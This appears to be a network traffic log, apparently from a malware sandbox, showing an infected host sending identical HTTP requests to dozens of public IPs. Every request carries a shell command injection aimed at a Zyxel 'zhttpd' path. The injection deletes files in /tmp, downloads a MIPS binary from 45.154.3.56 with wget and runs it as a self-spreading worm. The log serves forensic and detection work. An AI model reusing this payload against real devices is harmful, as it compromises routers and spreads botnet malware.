                        1927192.168.2.1455494112.212.99.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133260965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1928192.168.2.1451700207.48.138.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133311033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1929192.168.2.145773281.228.53.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133352041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1930192.168.2.1460464179.124.117.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133403063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1931192.168.2.144413663.120.42.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133450985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1932192.168.2.1447098187.125.223.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133490086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1933192.168.2.1444666150.208.145.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133533955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1934192.168.2.1436748211.1.144.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133563995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1935192.168.2.1442922130.18.143.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133613110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1936192.168.2.1433418203.77.44.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133672953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1937192.168.2.144451824.248.35.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133730888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1938192.168.2.1453328221.168.209.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133757114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1939192.168.2.1451198165.22.182.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133805037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1940192.168.2.144923419.247.121.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133827925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1941192.168.2.1457276220.236.152.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133877039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1942192.168.2.1442530139.40.234.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133904934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1943192.168.2.1457550208.177.151.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133941889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1944192.168.2.1457336168.189.26.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133980036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1945192.168.2.1458436163.148.113.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134038925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1946192.168.2.14343982.210.1.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134087086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1947192.168.2.1455910135.100.87.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134126902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1948192.168.2.1448472110.72.72.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134159088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1949192.168.2.1452430205.223.99.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134203911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1950192.168.2.145814239.194.189.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134253025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1951192.168.2.1439982206.87.52.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134306908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1952192.168.2.1440830136.12.80.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134356022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1953192.168.2.1437420168.142.106.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134398937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1954192.168.2.144788489.29.207.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134444952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1955192.168.2.145194079.13.124.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.134483099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1956192.168.2.145696473.199.239.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127613068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1957192.168.2.1449568198.174.192.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127671003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1958192.168.2.1452348161.166.196.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127738953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1959192.168.2.144850891.0.157.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127804041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1960192.168.2.1456338223.216.148.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127841949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1961192.168.2.1460192185.203.188.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127871037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1962192.168.2.144331035.106.115.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127912045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1963192.168.2.143605849.112.156.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.127964020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1964192.168.2.1448702189.217.50.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128005981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1965192.168.2.1460462172.245.98.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128031969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1966192.168.2.144807264.56.168.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128071070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1967192.168.2.1442008116.123.77.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128104925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1968192.168.2.1435682201.251.23.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128185987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1969192.168.2.1440846141.112.232.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128213882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1970192.168.2.145517893.123.118.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128258944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1971192.168.2.1441992126.144.95.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128319025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1972192.168.2.1458568152.31.11.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128350973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1973192.168.2.144461034.72.90.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128412008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1974192.168.2.1441334132.255.244.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128452063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1975192.168.2.146058836.64.242.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128478050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1976192.168.2.143402451.204.92.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128551006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1977192.168.2.1436394122.148.217.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128587961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1978192.168.2.1434824204.145.134.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128642082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1979192.168.2.1436966173.155.39.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128690958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1980192.168.2.1436002150.223.238.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128740072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1981192.168.2.1446660199.227.8.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128804922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1982192.168.2.1454896222.111.17.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128825903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1983192.168.2.1434706219.219.186.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128869057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1984192.168.2.144295660.19.108.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128914118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1985192.168.2.1445878115.15.251.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.128963947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1986192.168.2.1449048129.112.15.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129018068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1987192.168.2.1443374171.96.120.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129028082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1988192.168.2.1437532186.45.54.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129086971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1989192.168.2.1450228162.244.220.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129110098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1990192.168.2.1447978156.205.239.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129177094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1991192.168.2.144074660.98.2.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129190922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1992192.168.2.144992677.161.210.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129235029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1993192.168.2.1446648131.12.67.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129275084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1994192.168.2.1460884113.171.18.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129311085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1995192.168.2.144322624.143.45.93443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129362106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1996192.168.2.145036825.164.107.38443
                        TimestampBytes transferredDirectionData
